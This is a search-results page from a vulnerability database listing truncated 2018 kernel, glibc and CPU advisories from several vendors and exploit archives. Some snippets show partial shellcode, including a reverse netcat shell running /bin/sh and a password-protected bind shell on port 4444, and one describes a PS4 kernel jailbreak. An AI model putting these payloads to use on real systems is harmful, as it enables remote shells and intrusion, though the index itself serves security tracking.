Lucene search
K

1576 matches found

RedHat Linux
RedHat Linux
added 2018/03/06 9:48 p.m.7 views

Kernel: KVM: debug exception via syscall emulation

A flaw was found in the way the Linux KVM module processed the trap flagTF bit in EFLAGS during emulation of the syscall instruction, which leads to a debug exceptionDB being raised in the guest stack. A user/process inside a guest could use this flaw to potentially escalate their privileges insi...

7.8CVSS7AI score0.00698EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2018/03/06 9:41 p.m.4 views

Kernel: KVM: debug exception via syscall emulation

A flaw was found in the way the Linux KVM module processed the trap flagTF bit in EFLAGS during emulation of the syscall instruction, which leads to a debug exceptionDB being raised in the guest stack. A user/process inside a guest could use this flaw to potentially escalate their privileges insi...

7.8CVSS7AI score0.00698EPSS
Exploits0References4
RedHat Linux
RedHat Linux
added 2018/03/06 9:41 p.m.92 views

Important: Red Hat Security Advisory: kernel-rt security and bug fix update

An update for kernel-rt is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System CVSS base score, which gives a detailed severity rating, is available for each vulnerability from...

7.8CVSS6.8AI score0.00698EPSS
Exploits0References4
exploitpack
exploitpack
added 2018/02/27 12:0 a.m.17 views

Sony Playstation 4 (PS4) 4.55 - Jailbreak setAttributeNodeNS WebKit 5.02 bpf Kernel Loader 4.55

Sony Playstation 4 PS4 4.55 - Jailbreak setAttributeNodeNS WebKit 5.02 bpf Kernel Loader 4.55 PS4 4.55 Kernel Exploit --- Summary In this project you will find a full implementation of the "bpf" kernel exploit for the PlayStation 4 on 4.55. It will allow you to run arbitrary code as kernel, to...

0.3AI score
Exploits0
CNVD
CNVD
added 2018/02/07 12:0 a.m.2 views

Jiangmin Antivirus Denial of Service Vulnerability (CNVD-2018-03297)

Jiangmin Antivirus is a set of online antivirus software from the Chinese Jiangmin Jiangmin New Technology Company. A security vulnerability exists in the KSysCall.sys driver file in Jiangmin Antivirus version 16.0.0.100, which is caused by the program failing to validate an input value of IOCtl...

7.8CVSS6.4AI score0.00406EPSS
Exploits1References1
Tenable Nessus
Tenable Nessus
added 2018/02/05 12:0 a.m.55 views

Virtuozzo 6 : cpupools / cpupools-features / etc (VZA-2018-006)

According to the versions of the cpupools / cpupools-features / etc packages installed, the Virtuozzo installation on the remote host is affected by the following vulnerabilities : - CVE-2017-5715 triggers the speculative execution by utilizing branch target injection. It relies on the presence o...

5.6CVSS7.3AI score0.93838EPSS
Exploits12References5
Ubuntu
Ubuntu
added 2018/01/26 8:20 a.m.40 views

USN-3548-2: Linux kernel (HWE) vulnerability

USN-3548-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10. This update provides the corresponding updates for the Linux Hardware Enablement HWE kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS. Jay Vosburgh discovered a logic error in the x86-64 syscall entry implementation in the Linux...

5.8AI score
Exploits0References1
OSV
OSV
added 2018/01/26 8:20 a.m.2 views

USN-3548-2 linux-hwe, linux-azure, linux-gcp, linux-oem vulnerability

USN-3548-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10. This update provides the corresponding updates for the Linux Hardware Enablement HWE kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS. Jay Vosburgh discovered a logic error in the x86-64 syscall entry implementation in the Linux...

6AI score
Exploits0References2
Tenable Nessus
Tenable Nessus
added 2018/01/26 12:0 a.m.16 views

Ubuntu 17.10 : linux vulnerability (USN-3548-1)

Jay Vosburgh discovered a logic error in the x86-64 syscall entry implementation in the Linux kernel, introduced as part of the mitigations for the Spectre vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Note that Tenable Network...

5.9AI score
Exploits0References1
RedHat Linux
RedHat Linux
added 2018/01/25 11:59 a.m.4 views

hw: cpu: speculative execution bounds-check bypass

An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions a commonly used performance optimization. There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant...

5.6CVSS6.5AI score0.93838EPSS
Exploits9References8
RedHat Linux
RedHat Linux
added 2018/01/25 11:17 a.m.4 views

hw: cpu: speculative execution bounds-check bypass

An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions a commonly used performance optimization. There are three primary variants of the issue which differ in the way the speculative execution can be exploited. Variant...

5.6CVSS6.5AI score0.93838EPSS
Exploits9References8
seebug.org
seebug.org
added 2018/01/22 12:0 a.m.102 views

MacOS process_policy stack leak through uninitialized field(CVE-2017-7154)

The syscall processpolicyscope=PROCPOLICYSCOPEPROCESS, action=PROCPOLICYACTIONGET, policy=PROCPOLICYRESOURCEUSAGE, policysubtype=PROCPOLICYRUSAGECPU, attrp=, targetpid=0, targetthreadid= causes 4 bytes of uninitialized kernel stack memory to be written to userspace. The call graph looks as follow...

5.6CVSS7.2AI score0.01134EPSS
Exploits4
Tenable Nessus
Tenable Nessus
added 2018/01/18 12:0 a.m.58 views

OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0010) (Meltdown) (Spectre)

The remote OracleVM system is missing necessary patches to address critical security updates : - x86/pti/efi: broken conversion from efi to kernel page table Pavel Tatashin Orabug: 27363926 Orabug: 27352353 CVE-2017-5754 - x86/spec: Always set IBRS to guest value on VMENTER and host on VMEXIT red...

5.6CVSS7.4AI score0.84172EPSS
Exploits9References3
Ubuntu
Ubuntu
added 2018/01/17 1:51 p.m.62 views

USN-3536-1: GNU C Library vulnerability

It was discovered that the GNU C library did not properly handle all of the possible return values from the kernel getcwd2 syscall. A local attacker could potentially exploit this to execute arbitrary code in setuid programs and gain administrative privileges. CVE-2018-1000001...

7.8CVSS8.3AI score0.13614EPSS
Exploits9
OpenVAS
OpenVAS
added 2018/01/16 12:0 a.m.47 views

openSUSE: Security Advisory for glibc (openSUSE-SU-2018:0089-1)

The remote host is missing an update for the Copyright C 2018 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

9.8CVSS8.4AI score0.13614EPSS
Exploits15References2
0day.today
0day.today
added 2018/01/15 12:0 a.m.23 views

Linux/x86-64 - sethostname(Rooted !) + killall Shellcode (33 bytes)

Linux/x8664 sethostname & killall 33 bytes shellcode Date: 2010-04-26 Author: zbt Tested on: x8664 Debian GNU/Linux / ; sethostname"Rooted !"; ; kill-1, SIGKILL; section .text global start start: ;-- setHostName"Rooted !"; 22 bytes --; mov al, 0xaa mov r8, 'Rooted !' push r8 mov rdi, rsp mov sil,...

7.1AI score
Exploits0
0day.today
0day.today
added 2018/01/15 12:0 a.m.32 views

Linux/x86-64 - Reverse TCP (127.0.0.1:1337/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (109 byte

; Title: Shellcode linux/x86-64 connect back shell ; Author : Gaussillusion ; Len : 109 bytes ; Language : Nasm ;syscall: execve"/bin/nc","/bin/nc","ip","1337","-e","/bin/sh",NULL BITS 64 xor rdx,rdx mov rdi,0x636e2f6e69622fff shr rdi,0x08 push rdi mov rdi,rsp mov rcx,0x68732f6e69622fff shr...

7.4AI score
Exploits0
0day.today
0day.today
added 2018/01/15 12:0 a.m.21 views

Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Password) Shellcode (173 bytes)

;BindTCP 4444 with password ; ;Default password = Password ; ;If connected the shellcode no prompt for password ; ;Enter password directly and you get the bin/sh shell; ;if password is wrong the shellcode exit: ; ;Christophe G SLAE64 - 1337 size 173 bytes ; global start start: ; sock =...

7.1AI score
Exploits0
Tenable Nessus
Tenable Nessus
added 2018/01/15 12:0 a.m.44 views

SUSE SLED12 / SLES12 Security Update : glibc (SUSE-SU-2018:0074-1)

This update for glibc fixes the following issues : - A privilege escalation bug in the realpath function has been fixed. CVE-2018-1000001, bsc1074293 - A memory leak and a buffer overflow in the dynamic ELF loader has been fixed. CVE-2017-1000408, CVE-2017-1000409, bsc1071319 - An issue in the co...

9.8CVSS7.8AI score0.13614EPSS
Exploits15References25
OSV
OSV
added 2018/01/12 8:46 a.m.7 views

SUSE-SU-2018:0074-1 Security update for glibc

This update for glibc fixes the following issues: - A privilege escalation bug in the realpath function has been fixed. CVE-2018-1000001, bsc1074293 - A memory leak and a buffer overflow in the dynamic ELF loader has been fixed. CVE-2017-1000408, CVE-2017-1000409, bsc1071319 - An issue in the cod...

9.8CVSS8.5AI score0.13614EPSS
Exploits15References18
Rows per page
Query Builder